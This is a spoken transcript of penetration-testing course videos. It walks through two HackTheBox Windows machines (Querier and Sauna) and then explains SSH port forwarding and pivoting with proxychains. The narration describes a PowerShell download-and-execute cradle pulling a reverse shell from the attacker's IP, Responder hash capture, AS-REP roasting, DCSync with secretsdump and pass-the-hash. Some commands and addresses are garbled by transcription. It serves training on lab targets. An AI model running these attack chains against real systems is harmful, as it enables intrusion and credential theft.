you back when this is done and the hash has been cracked. All right, it has cracked the hash for us. Right here's the password. But before we move on any further, I want to pause and explain what just happened. What we had to do here is we used this SQL server that we were allowed to log into with the credentials we found inside of the reports directory, or file rather. The reports share is what it actually is, inside SMB. And when we got these credentials through that SMB share, we were able to log in through this MySQL server, and we were able to run this command, and then we ran the xdirtree command right here, and we told it to this SQL server to go out through this command and go to our IP address, which was right here where we were listening on Responder. We were just waiting for some kind of connection, and we told it to go to this share, and this share does not really matter even if it finds it or not. The most important thing is that it tries to connect to our IP address with Responder, and Responder was sitting here listening, and it was waiting for something to make a connection, and it's actually sitting as a man-in-the-middle attack. It's just listening, and once a machine from the network tries to connect back to responder, it will grab the hash that it's trying to connect with. And that's what it gives us here. And so we have this hash that goes to this SQL server. And then we crack the hash, and now it'll actually tell us this is the user that it was trying to use. So this is the user, the username is what it's trying to connect with, and this is the hash. So we have the username and the hash. And now what we can do is use this username and the password, which we just cracked over here, to try and do further enumeration. So from here, we can go back and try to enumerate with SMB map and see if this is an admin account, but it's not. So to save us time, what we'll do is we will grab this password and we're going to put it into our notes. So that way we have it. Put this, and then we need the username right here. And we will put it into our notes as well. We'll save it. I did those backwards. I don't usually save them that way, but it'll be okay. Now we can close responder. We can come back over here, and this time we're going to try and connect to the SQL server, but we're going to try and connect through this new user that we have here. We'll come back and we'll just scroll up and grab this password. Paste, and we're going to type help, and we're going to see if we can get this command shell to work, so that way we can run commands on the box. So we'll paste, and now it says it has enabled for us. So what we can do to test this is copy this right here and then put in a command. Who am I? And see if it responds. It says we are on the box. So now that we can run commands as this user, we can come over here, and now we will set up a netcat listener. But before we do that, we'll cd desktop HTB, and we are on Quirier, and we're going to grab a shell. But before we do that, we need to go to Google. We need to go Nishang GitHub. We're looking for the Nishang PowerShell, and we're going to try and grab the shells off here. Let's see if this has what we are looking for. It does. There's the shells. So we'll actually just grab all of this. We'll just copy. We'll come over here. The place I like to save things is we'll go CD, and we'll go backwards, CD opt, and then right here we'll go a git clone. Then we don't have that installed, so we'll do a wget, paste, and this should go out and get everything we need. We will need to sudo this. And now we can ls, and we can, all right, that did not grab what we needed. So what we'll do is we'll just come into here and we'll just copy the shell. Where did the shells go? Shells. We need invoke PowerShell TCP PS1. This is what we need. So we'll just copy this and we'll make it our own. We do need, you will want to get these shells, all these shells, or just save it. This one is one you're going to use a lot in the world of getting reverse shells on Windows boxes. But for this case, what we will do is we'll just copy just this one shell, and we're going to go gedit, and we'll call it shell.ps1 because we're going to run it through PowerShell. We're going to paste, and the one that we are looking for, the example that we're going to change, is this one right here that has the dash reverse. We'll go ahead, copy this, move to the bottom, paste it. Now what we'll change is this here in red. We will delete. We will go our IP address 10.10.10.14.15, port 444 is fine. We'll save this out. We'll come back over to our terminal. we will need to start a netcat listener, or not. We will need a netcat listener too, but we need a HTTP server. Over here, we can put our netcat listener. So we'll just go netcache dash lvmp delete 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 4444, and now we are listening. And so what is going to happen when we put our command in here, which you have seen this before, but we haven't run it. So under the Windows shells or getting files on Windows machines, you've seen this before, but we haven't actually run it. What we'll do is we'll go PowerShell, and then we go IE, IEX, and then new object net dot. It's actually new object net dot web client dot download string, and then in here we will go http / our IP address, so that way it will reach out to our IP address to grab our shell.ps1. We can close this off. So when we run this, what's going to happen is this SQL server is going to run this command. It's going to go PowerShell. It's going to run this. It's going to go out to our IP address, grab the shell that we just made. And because we have this server running right here, it is going to grab the shell. It's going to execute it over on the Quirier box as this user, our user right here. And then when it executes our payload, it's going to give us a shell back over here, we hope. So we'll go ahead, run this, and see what happens. Okay, so what it ended up being was we needed to escape these and not have these single quotes here in order to get this to run. All right, we are now on the box, and we are going to run power up. We're using PowerShell here, so we'll go ahead and cd back users, and then we can cd into the desktop, and that's where we'll place our shell. I'm going to reconnect because that was going to lag. This is where we'll go paste our PowerShell. We'll cd back, cd back, cd users, look and see. We'll cd public, and then we'll cd downloads, and there shouldn't be anything in there, and there's not. So we're going to pull over power up. I'm not sure if we have already put this onto our Kali box, so I'm going to locate power up dot ps1, and it looks like we haven't. So now we'll come back to Google and we'll go powerup.ps1. And I'm going to show you PowerUp because it is one that you're going to probably run in the future. But normally when you come on a Windows box, the first thing you're going to do is you're going to go linps, who am I, netstat.ano, and you're going to look at all of those things we've already shown. But eventually you're going to run into a bunch of dead ends, and it's going to be time to start running things other than winps. And one of those things is PowerUp. And we have not seen this yet, so we'll go and gedit powerup.ps1, and we'll put this onto our Kali box. And then we will bring it over here and execute it. So what we'll have to do is start up this simple server again, and we're going to go, because we're already in PowerShell, we can just type IEX new dash object, and then it's net dot wherever my dot is dot web client dot download string, and then we're going to put in HTTP and then our IP address, and then powerup.ps1, and then we'll close all this out, and Cross our fingers and hope I have no typos. It came over and grabbed power up. It should have executed it. And now we will go invoke dash all checks to see what it can pull down for us when it runs this. This might take a minute to run, so I'll go ahead and pause this video and bring you back once it has ran. All right, this is still running, but we'll go ahead and start looking through what PowerUp has found. So if you remember, we pulled this over, and I told you a long time ago to write this out on a note card and memorize it because you're going to need it. And then you can grab these files, and because we're using PowerShell, it doesn't actually pull the file over, it just runs it. And when we see this right here, this SE impersonate privilege, we talked about this earlier as well. This is when you start thinking potato attacks, but we're not going to run that here because there's actually something better. But if you ever see this SE impersonate privilege, you can automatically think potato attacks and start looking at what the architecture is on the box and what year, and determine what potato attack needs to be run. And as we continue to look through here, it tells us what service is running and the path to get there. But what's really interesting right here, it tells us a username, administrator, and then a password right here. And in good fashion, we are going to highlight the password. And I'm not sure if we can exit this yet. We'll just go, and our script hasn't finished running, but that's okay. We'll just stop this simple server here. We will gedit our notes. We'll put in administrator and then the password. Save that. We'll close this because it's taking a while to finish, and we'll just reconnect our shell over here. Actually, we don't need that shell anymore. We can stop right here. There's a few things we can do now that we have new credentials. So we'll exit out of that. We can try and do the evil -win rm and see what we have here. So we'll go evil win rm, and we will run a -I, and it's going to be on 10, 10, 10, 125. We have a user with a -u, and the user is administrator, and a -p for the password, which I'm hoping is still in our clipboard, and it is. And we can run this, and it tells us no such word in event. It's possible, because this has these weird characters, we might need to put that in quotes, and it looks like we do. And we can let this run and see if we can come back with an evil win rm shell. If not, we have several other ways to go about getting this shell, but I like evil win rm because this port is open and it's easy to put files and get files from evil win rm. And this didn't work. And so what we can try now is we have impacket, and we can run -ps exec. And if you remember, we have run this before. Let's look at the command. So that way it'll tell us exactly how to run this. We will run ps exec with the domain, the user, the pass, and the target. And you've already seen us run ps exec, and I actually haven't run it on this box. That's something you can go ahead and try and see if it will run. We're going to try a different way to get a shell. It's always good to know multiple different ways to get a shell, just in case you have some fail, like we just had evil win rm fail. And so we'll do another impacket tool. We can use impacket, and this is wmi exec, and we will type in the administrator. We better capitalize this to make sure we get it right. Administrator. We'll put in the password, and then we'll go @ and then the IP address 10, 10, 10, 125, and close that off, and see if we can pull down a shell this way. And we can go, who am I? And we are administrator, and we now have administrator access, and you can go anywhere you want on this machine. So this is Quirier. The reason I wanted to show you this machine was to show you power up being used and also responder. And it's most important for you to remember responder because it's one you're going to need to know and you're going to see in the future. So with that, I will see you in the next video. Okay, we are here. We are going to do our last Active Directory box. I saved this one for last because it has a lot of information in it that is related to stuff we have already gone over. I think most everything we are going to go over we have seen except for Bloodhound, which we're going to do at the very end, and I'm actually going to cut the video so that way in the future when you encounter an Active Directory box, you can come back to this course and you can click on the video Bloodhound and you will be able to walk through the usage of Bloodhound, and you're going to be able to come back here and play with Bloodhound on your own and get a better feel for how to use it. But with that, I have already ran the nmap scan, and this is a great Active Directory nmap scan because we see a lot of ports open. We have 445, we have LDAP, we have SMB, we have the WinRM port, we also see Kerberos. So there's a lot going on here, and we also see a web server. So the first thing we do, as you're accustomed to doing, is running your GoBuster. I'm going to start a derb just because it's easier to run, and it's not, I'm pretty sure this web server doesn't have PHP or anything like that, any extensions needed. So we'll type in 10.10.10.175 so that way we have that running, and we can come to the web server and give it a look around. So we'll look through here and see what's going on. You can click around. So go to the contact us. You can check for different things. Here we do have a .html, which won't matter in our derb. Scan we have running in the background. Go to blogs. See if there is about us. Nothing interesting on the about us. Down here we note that we have a meet the team. There's some people, can't click on them. One of the things to always check if you come to a meet the team, something like this, you can go and look for emails and see if you can enumerate emails, and sometimes they'll shorten these down to like S driver, which we're going to see in a little bit. So the first time I ever did this box, I got really lucky and it actually went super fast. So when we come here, we scroll down, we see SMB signing enabled but not required. So we'll go ahead and go SMB map and type in the host. We'll go 75 and let that run. Nothing, so we can run SMB client -in -l, and we'll run this as 75, and it tells us the connection failed and we don't have access to connect. I always like to test this one more time with those slashes at the beginning, slashes at the end. Sometimes it makes a difference, sometimes it doesn't. And it tells us we can't connect to the SMB client, and we can't use any of our in-packet enumeration because we don't have any users. So the first thing I did when I did this box is about as quick as we have just gone through this. I said I need these users and I need these usernames. First thing I went ahead and did on this box was I grabbed this, and I knew if I could get one of these users, if I could enumerate one of these users, I could pull down a hash. And so I went and I typed in in-packet -get np users. We can run this with the no pass exactly like this, and we can run the user here, and I went F Smith. There is a tool out here that will run this enumeration for us, which is Kerberos, and I suggest you go and look at it. It's really simple to use, and if you were trying to enumerate users, you would just go out to Google, grab a list of usernames and run Kerberos, and I have used it. I let it run one time for like maybe an hour, and it did find several usernames, and it really helped me out on the box I was running. So we can run this. I think that looks right. It was not right. We have to change this right here. We are running egotistical bank, and I copied this right here. We'll get off, make that not highlighted. Where I found that was right here from our nmap scan, egotisticalbank.local, and run this. If it doesn't work, we might need to add that to our Etsy hosts, and it ran, so it looks like we don't have to. We've already seen this as well in the past. This is the TGT ticket, so we got a ticket granting ticket from the egotistical bank, and now that we have this ticket, we can crack it. So we'll go hashcat. Or actually, we're not ready. We need to gedit hash.txt. We can paste this hash in here and check and make sure it pasted the entire thing. And it did, and we can save this. We've seen this as well in the past. We can come over here and type in this right here, so that way we know what we need to run. And it's right here, 18200. Now we can type in hashcat. Our location for the word list is already saved in there. We can go 18200, and this should crack the hash for us. So what we'll do is I'll pause this, and then we'll come back once this is cracked, and we will continue on with this box. All right, this has cracked the password for the user fsmith. When I originally did this, we're not going to walk through this right now, but I tried to see if I could get the hash for every single one of these. I went fsmith, scollins, and you can, the only reason I tried fsmith is because it's really common to use a first initial and a last name when making emails for companies and usernames, and so I went ahead and just typed that in. Like I said, you can use Quirier if you're struggling with that, or you can use a tool that'll make a bunch of common usernames with names that you input into that. But I didn't have to do that, and I have used Quirier in the past, like I said, so know that you don't have to manually test for this, but this is how I did it when I originally did the box. And it's helpful to know that's just how companies usually label things when you run into this in the future. So we have this hash and we have it cracked. So we'll copy this, we'll come over here, we can close out of that. It's not pulling down anything for us. We can gedit our notes, and we can type in fsmith and the password now that we have that. And because we now have a user, one of the things I think we should try to do is we'll go evo winrm and see if we can log in as fsmith. So we'll go evo winrm -I, and we need 10.10.10 for the IP, and it's 175-u fsmith-p, and we'll paste in the password and see if we can get onto this box. And we are able to get on the box, and like our enumeration videos for Windows, we'll go ahead and we'll dir, and somebody has already been on this box and ran it, because we're going to do this here in a little bit. So I actually might revert this box, but we'll go back one directory, and we'll actually cd into downloads. Maybe somebody hasn't been in there yet. Cd downloads, dir, this directory is empty. So what we're going to do is grab WinPs and put it onto this machine. And the easiest way to do this is I'm going to cd desktop tools ls. Do we have WinPs on this box? We do not. So we'll come out here, we'll go winps.exe, and we'll grab it off of GitHub. We're on the GitHub page, we scroll down to the release page. Let this load. I like to run WinPs Annie right here. We can, let's see if we can copy this link. Copy link. I want to put it right here so that way we can just upload it. So we'll do a wget on that link. We can ls, and it is in there. I'm going to change this name because I don't want to type in with caps, so I'm going to go move winpeas to winpeas.exe, ls, make sure that name has changed. Come over here, we're going to type in upload winpeas, and then we'll run out the autocomplete. I'm used to it just saying winpeas, but it's giving the full path on the box to grab the file. So this is going to upload, and then we'll run winpeas and see what it pulls down. All right, now it has finished uploading. We can ls, we can see that winpeas is on here. So we can try to run winpeas like this, winpeas.exe, and see if this will run, and it is running. I'm going to go ahead and let this run for a minute, and then we'll look at the output as soon as it has finished running. All right, so WinPeas has finished running. So what we'll do here is we'll scroll down and look through some of this information. We have this username, system, not finding a lot of information there. Nothing looks too interesting yet. So we'll keep scrolling. We're on as current user F Smith, current user F Smith. We see the computer name, administrator, looking for our auto log on credentials. This looks helpful. So we have a default username. So here's a username and a default password. So right here's a password. We have some stored credentials here. So what we can do is copy these. We will gedit the notes once again. We will paste this in, and we will save this user right here. And to save us from a bunch of looking through useless files, at this point, what I am going to do is we'll pause this video, and then in the next video, we will install Bloodhound, Neo4j, and run Bloodhound. It's a tool that you're going to hear about a lot, and you're going to see whenever anyone is talking about Active Directory. So it's helpful for you to know what Bloodhound is. So we'll do this in the next video. See you there. Okay, this is going to be a little bit of an overwhelming video as we cover Bloodhound. But nonetheless, it is something we need to cover, and you can reference in the future whenever you're on an Active Directory network and you need to run Bloodhound for more information. And it kind of gives you a layout of the land. And it's really nice because this specific network isn't overwhelming. There are some networks when you run Bloodhound, it is a convoluted mess, and this is actually a really nice introduction. So when we run Bloodhound, before we run Bloodhound, the first thing we need to do is sudo apt install Bloodhound. So sudo apt install Bloodhound, just like this. We're going to type in yes. And when we install Bloodhound, it's going to go ahead and install the dependencies we need, and one of those is right here, Neo4j, because it's going to use the Neo4j database inside the Bloodhound application. I'm going to go ahead and let this install, and then I'll unpause the video once it has finished. Actually, while this is installing, we'll grab the executable file from Sharphound, the executable file Sharphound from the Bloodhound GitHub page. So we can type in GitHub Bloodhound, and we're going here because we do not want to compile this ourselves. So we can come into GitHub, look at these collections, and right here is the Sharphound that we need. So we can copy this link. We're going to save it into this directory. So we'll do a wget on that link. We can ls. There is Sharphound, which we will need. It looks like Bloodhound is done, so what we will need to do is run Neo4j. So we'll go sudo start Neo4j. Okay, apparently we don't need that. We can just type in sudo neo Neo4j, and then we're going to type in console, and this should run for us. And once it is up and going, we're going to have to go to Neo4j and update our password. So we'll copy this right here. This is the port that it is running on. So we'll copy, come out here, paste it in. The first time you log in, it's going to make us update our password. So our username automatically is Neo4j, and the password is Neo4j as well. Don't say password. And now it's going to make us update our password. I'm just going to make my Neo, change password, and we are connected. It says we are connected as the user Neo4j. Remember the password that you just set, because you're going to need it to log in to your Bloodhound application to run our file that we are about to grab. So now we need to come to our fsmith. We're going to upload the sharphound. So we'll upload sharphound. We'll let that finish. And when that is finished, we're going to run sharphound. So we'll go like this to run it. And sharphound is running, and it is collecting the data that we need. And when it is finished, we will launch this into Bloodhound. So what we'll do is we'll come over here and we'll just type in Bloodhound, and this will launch Bloodhound for us. And we're going to type in Neo4j and our password, whatever you changed your password to. I totally typed mine in wrong. And it says we have success, and it's going to log us in. We'll make this smaller because we're going to have to drop in a file once this finishes running. Sharphound has finished running here. I went ahead and looked, made sure it was there. What we'll do is highlight this. You will type in download, and you will download it into your Sauna directory. And I wasn't able to get this to download over here in the download, so I switched over to documents and I re-uploaded Sharphound to this place. I ran it, as you can see up here. Here is the file that came out, and then I was able to successfully download this. What we'll do at this point is come over here to our Bloodhound, come to HTB, and we are in Sauna, and then you just drag this zipped file over here, and it will upload for us. It says it's uploading. I think I hit cleared too early. Might have to do that again. Upload, Sauna, and let those upload. Says they are uploaded. However, my database info now, maybe it has uploaded. We'll come over to analysis, and the one we are looking for, you can click through these and get a feel for what's in here, but the one we're looking for is this one right here, and we will hit upload. And so when you're in these, like if you're in here and you see you're just clicking around, this is RDP, say we can remote desktop in, and you can actually right click and go help and click abuse, and it'll tell you how to go about abusing a specific vulnerability in order to get to the domain controller. So what you're looking for in here is, because this is a DC sync, and we know we have different ways to DC sync in, and it tells us we can go with different users over here. We have 2 users to try this with, so we'll go ahead and close out of Bloodhound. We don't need it anymore now that we see we have that option. And close out of that file. We'll shut down Neo4j. We can close out of this. And Impacket actually has a tool for this. So we can go Impacket -secrets dump, and then we will type in the domain. So we have egotistical. I'm actually going to copy it rather than work on typing all that out. We'll go egotistical bank.local, and I can't remember which one of these we were in. Paste that in. We'll go /, And we're going to try that user that we found earlier. So we'll close out of this and we can cat our notes and we'll try this user right here. So we'll copy, paste, and then we type in at the IP address we are attacking. It's going to ask us for the password, and we found this as well in our WinPeas script. We'll paste this in, and it tells us we have an error here. All right, I had to pause the video and go look up the proper syntax for the secrets dump, and it looks like this. So we have the inpacket, secrets dump, SVC, load manager, we use our username, and then our password that we found, and it goes at the IP address, and we'll run this, and it's going to grab this ntds.dit. This is a very important file. If you ever come across this, this is something you're going to want to grab and look inside of. And we see now the users, and we have the administrator user, and this is one of the hashes. This hash actually is nothing, so you can see right here AAD3, and that's because Windows doesn't use this hash anymore. So this is the one we want. And you may have heard of a pass the hash attack, but you have not seen it yet. So this is going to be a pass the hash attack. We're going to use it for the first time, and it is also going to be an inpacket -ps exec, and we're going to use the egotistical bank, egotistical -bank .local / and we're going to go administrator because they are right here. That's where I'm getting that. And it's going to be at the IP address 10.10.10.175. And then we're going to go -hashes because we're going to be using a hash. And then we paste. And I think that it gets pasted in this way, just like that. And it is working for us. So we say, who am I? And we are now authority system. And the reason I pasted the hash in twice, the exact same hash, is because PS exec is expecting two hashes. It's expecting this one and this one, but because this AAD3B, you'll see it here, it just stands for nothing. So what we have to do is we have to use the same hash that actually has significance 2 times. And that is the box Sauna. So with that, I will see you in the next video.
Okay, so in this video, we're going to be talking about proxy chains and how to use them for port forwarding through SSH. And I've noticed on YouTube, whenever you type in proxy chains, what you're going to find is how to use Tor with proxy chains. This is going to be pretty similar, but instead of using Tor, we're going to be using an SSH command that gets us into a network. And then eventually we're going to be using proxy chains in order to get into a network that's going to take us into a subnetwork in order to access different machines on there. So with that, let's go ahead and check out this machine. I've already typed this out, so that way the command is in here. So this is where your proxy chains configurations is going to be. So let's go ahead and open this up, and then I'm going to show you what we're going to be using. So there's dynamic chains, and you can read these and it'll tell you what's going to be done. I think by default it's going to have strict chains, and for our purposes we're just going to leave it at strict chain, and we're not going to change really anything in here. But what I want to show you is all the way down here at the bottom we have this SOCKS4 127.0.0.1 on port 9050. So when we run proxy chains, what happens when we SSH, it's going to send everything back to our local host and then port 90 and then through port 9050. So when we do something like dynamic port forwarding, what we're going to be able to do is go to our local host, and then we'll be able to use proxy chains on port 9050 to access everything on the inside of a specific network that we are attacking. So that is a brief overview of how proxy chains work. So you're going to see this 9050, and now you know where this 9050 comes from. And when we type in like proxy chains Firefox, we open up Firefox, and then we're accessing a web server on a different network or even a subnetwork of a network that we have SSH'd into. It's going to be on localhost, and then it's going to be coming through 9050, and then we'll be able to access all of the ports on the internal network. That's how we can use proxy chains to run an nmap scan on an internal network that we otherwise wouldn't be able to. So when we use something like this, it's going to give us all of our regular tools on our attack box that we can use inside of a network. Because if you're familiar, when you have code execution on a server, you don't have access to all of your tools and you have to transfer tools and transfer over payloads. But when we are able to SSH and use proxy chains and dynamic port forwarding, then we're able to scan the internal network with our attack box, which gives us the ability to use all of our tools that we already have access to. So that's why you're going to need to know this. You're going to see this in the future. So let's go ahead and check out some dynamic port forwarding and how exactly that works and in relation to proxy chains. Okay, so here we are at our attack box. This box is just Kali Kali, and it is outside of the private network that we have over here. And so we have this box over here, and it is just PhD sec1 right here. And it doesn't have any ports open except for SSH. And then over here, we have another box over here, and it is called PhD sec2. And I changed the names just so you'd be able to see that we are moving between different machines. So this one, we are going to run Juice Shop right here. I have already started Juice Shop. And if you want to learn how to install Juice Shop and practice on Juice Shop, I'll link that video in the description. So we are running Juice Shop. So if we come out here and we go to Firefox, and then we visit our localhost 3000, this is going to go ahead and take us to Juice Shop. So you need to know how to access a web server from inside of a network. So we're going to come inside of this first box right here from our attacks box. We're going to SSH in here, pretending that we have found some credentials. And then we are going to scan this local network. We're going to find that we have another machine over here that actually is running a web server, and we need to access this web server in order to exploit it. So that's where we're going. It sounds really complicated, and often when I think about doing things like this, what comes to mind is the movie Inception. We're going to be going inside of a virtual machine, then we're going to move around inside that virtual network. So that's where we're going. So we'll start out really simply. So let's say we have taken over this box right here. This is going to be our jump box. So we have access to this box, and what we're going to do is we're just going to give an arp-a, and we're going to see that there is another box right here. So what we would want to do is be able to access the ports on that box. So what we have to do from over here is just a really simple dynamic port forwarding, and it looks like this. And you remember we grabbed this PhD sec1 from our username, pretending that we have found credentials on a web server or maybe through some SMB shares. And so we have this right here, and we know the IP address because it was in our network range of the boxes that we are attacking. So we can go ahead and run this. And actually, before we run this, I'll show you how you would set this up. You would need to sudo gedit your proxy chains, and it should be set up just automatically if you're on a Kali machine, because you scroll all the way to the bottom and it's going to have this, I believe by default, and I think we're using strict chains. So it doesn't really matter. I think it's automatically set up. I didn't change anything in order to be able to do this. So we can come back over here, and I'll just copy this and we'll paste it in. And so we're going to go ahead and SSH over into this box. And you can see our name has changed right here. So now we are inside of this box over here. So if we run an ifconfig, we are going to see that we're inside of this private network right here. So we're inside of a private network, and we can now run our arp-a, and you're going to see that we have this other box right here that's inside of our network. This is the IP that we're currently at, and this is the IP right here that we need to be able to have access to. So what we can do at this point is just leave this right here, and we can open up a new tab, and we can type in proxy chains, and we can use proxy chains to run an nmap scan. And so I've already ran this just to check to make sure it works, and we can run it on port 22, which we know is open because SSH is open. Port 3000, that's what our web server is running on. And then we'll run a couple other than just 21. I want you to see what it looks like when you have closed ports. So we can go ahead and run this, and we have an OK right here and an OK right here, and it tells us the server has run out, or the server has timed out. And so proxy chains is going to say that we want to, which we set up over here when we ran our dynamic port forwarding right here. It is going to allow us through port 9050 to access everything inside of a proxy chain. So we can run proxy chains and access everything that this machine right here with this IP has access to. And so this 9050, we get this port from our Etsy config, Etsy proxy chains config file, which I showed you earlier when we did this gedit, wherever it is right here. So I showed you where that port was coming from, and it's going to have an S, I believe, for strict chains when it runs over here. Yeah, strict chains right there. And so it's running strict chain through our local port through 9050 and is going out to the IP address that we are running our dynamic port forward on, wherever it is right here. And it'll test this port not open, port 21 not open, port 22 is open, port 3000 is open right here. So on our nmap scan, it tells us right here it's open, and we know that we have a server running because I showed it to you right here. So this would be something you might see or on an nmap scan that would pull down and it would tell you it is a web server. So now let's go ahead and actually access this web server on this machine right here. So this is going to be a little bit tricky. It's really not that hard to run. It's really hard to wrap your mind around the first couple of times that you run it. So we'll go ahead and we'll exit out of this, and you'll see that we are no longer PhDSec. We are Kali back on our attack machine. We can just leave that how it is. And so what we'll do is we'll run a local port forward, and instead of you watching me type this out, I'll just go ahead and type it out and then bring you back. So I decided we'll go ahead and run just a local port forward before we do any kind of jumping and it gets really complicated. So let's say that we have credentials to access this machine right here, and we need to access this web server. You will need to know this in the future. What we can do is we can just run this right here. We're going to local port forward to port 1234. And so when we access our localhost 3000, which is going to be this server, I'm gonna move these over so we can see them, which is gonna be this server right here. We will be able to open up our Firefox and we'll be able to access localhost 1234 right here, and it's gonna pull open Juice Shop from this machine right here. So what we can do is run this. We're gonna need to provide it the password, and we are now PhDSec2, but it's local port forwarding port 3000 to us on port 1234. So now if we come over here and run this, we have access to Juice Shop, which is actually running over here on this other server. You will need to know this. You will see this on certification. So if it is confusing, you might have to watch this video a few times, and I'm going to make a video that's going to be a lot more in depth in the future. So you can go ahead and subscribe for that. And I'm going to show you how to set all this up, and maybe it will make more sense to you then. We're just doing a high level overview for now. So that's one way to go ahead and access this. And then another way to access this is going to be through jumping from one box to the other. Okay, so let's say that we need to access this web server and it is inside of a subnet on this box, and so we have to SSH into this box, and then we need to be able to SSH from this box to another network in order to access this web server. So what this looks like is going to look similar to this, only we're going to use a J here, and then we're going to throw in a dynamic port forwarding. So I'm going to go ahead and type this out and I'll walk you through it. Okay, so here's what we have. We have this SSH, and we're going to jump from the first box, which would be on one subnet that we're trying to get into. And the only way to access this subnet is through this specific box. And so we're going to give it a dynamic port forwarding, and we're going to run it through localhost and then our port right here. So we're going to be able to use proxy chains in order to reach this. So what we can do is we can run this, and it's going to take us from PhDSec1, and then it's going to say PhDSec2, and now we have access to this box right here. And I believe we should be able to go proxy chains Firefox, and this should open up Firefox for us. And I think we can go localhost 3000 now. I actually haven't tested this, but if memory serves me right, yeah, we're able to access this through proxy chains here on Firefox. So we essentially, let me close out of this so it stops running. What we did is we were able to SSH into our first box right here. And the J, I'm going to assume it stands for jump, because we're jumping from this first network into a different network, and it's going to be sending back all of the ports on this network, or this specific machine in this network that we're not able to reach, to us on our local machine through port 9050, and we're able to access that port 3000 through this jump to a dynamic port forwarding. So that seems a little complicated. And I guess it kind of is if you've never seen it before. So this is the first time I have ever gone through trying to teach port forwarding. And I'm pretty sure that after recording this, it seems like it's extremely complicated. I don't know why, but in my mind, it's not that complicated. So if you have any questions, please let me know down in the comments. All right, and the final type of port forwarding we're going to be looking at is the double jumping or double hopping port forwarding. And what that's going to look like is here we are again as our attacker. We are able to find SSH credentials to this machine right here. And when we're doing our enumeration, we end up finding another user named John and his password of password123. And we're able to SSH into this machine over here. But then there's an extra network over here that we want to have access to. How would we be able to scan or ping sweep this network over here when we only are able to SSH in over here? This is where your double hopping or double jumping comes into play. I call it double jumping. I think it's actually called double hopping, but we are right here. So we SSH in our SSH command. We're going to say we want to SSH and our flag is going to be a -J for jumping. We're going to use this as our jump point or our jump box. And then we're going to SSH over here and we're going to port forward everything to us ourselves dynamically through proxy chains. And then we'll be able to have a terminal back here on our Kali box. It would be victim number 2 as our little name right here. Instead of PhDSec2, we'll have victim number 2, and then we'll be able to use Nmap or whatever we want in order to scan this network over here that we're not even able to see because this box isn't hooked up to. So we're able to we're able to jump to point number 1, and then we're able to dynamic port forward to point number 2, and then we're able to access this internal network right here. It would be a sub network right here. So some of this is going to sound really confusing, and I hope that as I give you this practical example in the next few videos that it becomes a lot more clear. We're going to walk through scenarios where we're actually going to do all of these things. I know this is going to be really confusing. I know it's going to be really hard to wrap your mind around, but this is something you do really need to know if you want to be a penetration tester. So we're going to go ahead and check that out in the next video. Okay, so we have this little image here put out by Slayer Labs. I just pulled this off of Google, but I thought that it was a really good image for what we're about to explain. So we have our attack box right here, and then this right here is a network with different machines on it. So we have this server right here, and then there's 2 others. But if you look at the IP range, all of these are on the exact same network. So it is possible that you will gain access to this machine, and then you'll be able to pivot over here to this machine. But then over here, this machine has access to a completely different network. And this will be something that I'm going to try to walk you through on how to get to different networks and different ports within networks and how to scan those in the future. But for the simple explanation of how dynamic port forwarding works, we would be this guy right here as the attacker. Let's say we gain access right here, we find some credentials, and we're able to SSH into this machine. What we can do is use SSH dynamic port forwarding, and then we'll be able to use all of our Kali Linux tools in order to run an Nmap scan over here. We may have access to this network and this machine right here, and we'll be able to run like an arp-a or a route print, and we'll be able to see the other machines on the network. And so we can see these, but we need to be able to scan them. We need to know what ports are open. We need to know what is going on. Maybe there's a web server that we can have access to or something on these internal machines, but we need to be able to scan them. What you can do is run a dynamic port forwarding. And so what will happen is you'll be able to run your Nmap scan through proxy chains. So when you SSH in, it's going to show you that you are this person on your actual Kali box over here. We would be logged in as victim 1 over here, and we'll be able to run something like proxy chains Nmap and then the IP address over here that we want to have access to. Because when we tell it we're running as proxy chains, it's going to say, okay, we're going to take this IP address right here and we're going to use that as our start point, and it's going to run everything through that port 9050 that you saw, and it'll run the Nmap scan. It runs pretty slow, and we're going to walk through this, and I'm going to show you how this works, and you'll be able to see what it looks like in the future. But it's going to run the Nmap scan against this IP address right here. So what you do is you'd say proxy chains Nmap with your regular flags, and then you would put in this IP address, and you can run an Nmap scan on an internal network from your Kali machine. So if you're familiar or you've been around long in the world of CTFs, then you'll know normally when we gain remote code execution on this box right here, we are not able to do anything over here unless we're able to SSH. We won't be able to run an Nmap scan because this machine right here may not not have Nmap on it, and we're not able to scan in here. And then you just have to start doing some enumeration and try to find different passwords or credentials in order to get onto one of these machines. But if we have an SSH access to this machine, then we can dynamic port forward and we can proxy chains in order to scan the internal network. Another thing about dynamic port forwarding is you can run a ping sweep and then open up Wireshark, which you will need to be able to do in the future, especially on certifications, because you will get asked questions like how many machines or how many IP addresses were live on the internal network. And sometimes when you run an Nmap scan and you're just looking at an Nmap scan and you don't run a ping sweep, let's say this box right here has no ports open and an Nmap scan isn't going to put out any results that this was live. But Wireshark, you'll be able to see that this was live. And so we're going to cover this a little bit more in depth, and we're actually going to walk through doing a ping sweep and looking at Wireshark in order to see live machines. But for now, this is going to be some dynamic port forwarding and how it works. In the next video, we're going to look at some SSH jumping or double hopping, whatever you want to call it. So let's go ahead and check that out. Okay, in this video, we are going to be looking at local port forwarding, and this is actually going to be one of the more easy types of port forwarding to do with SSH. What we do is the same image right here. We are an attacker. We have found credentials to this machine and we're able to SSH in, and we see that this IP address right here has an internal web server running on port 80. What we can do is we can just run a port forward. So we'd run our SSH and then we would send it through our local host, and this is going to send back to us whatever we ask it to, and it'll say we want port 80 and we want to access port 80 on port 123. We'll be able to run our SSH into this machine. It's going to come out to this machine and it's going to grab port 80 and it's going to bring it back to our attack box over here, and we'll be able to access this internal web server that is running on port 80 on port 123. So a local port forwarding, instead of being similar to dynamic port forwarding, in dynamic port forwarding we have access to all of the ports, or we're able to scan all of the ports, or we're able to access all of the ports through proxy chains. When you do a local port forward, we don't have to run proxy chains. We're able to just go out and say localhost port 123, and that port will automatically run over here and grab this port 80 and send it back to us on port 123, and we're able to access this on Firefox just by running this local port forward. But we only have access to that one port on this machine through this one. So local port forwarding sends us back one port, whereas dynamic port forwarding, we're going to have access to everything through proxy chains.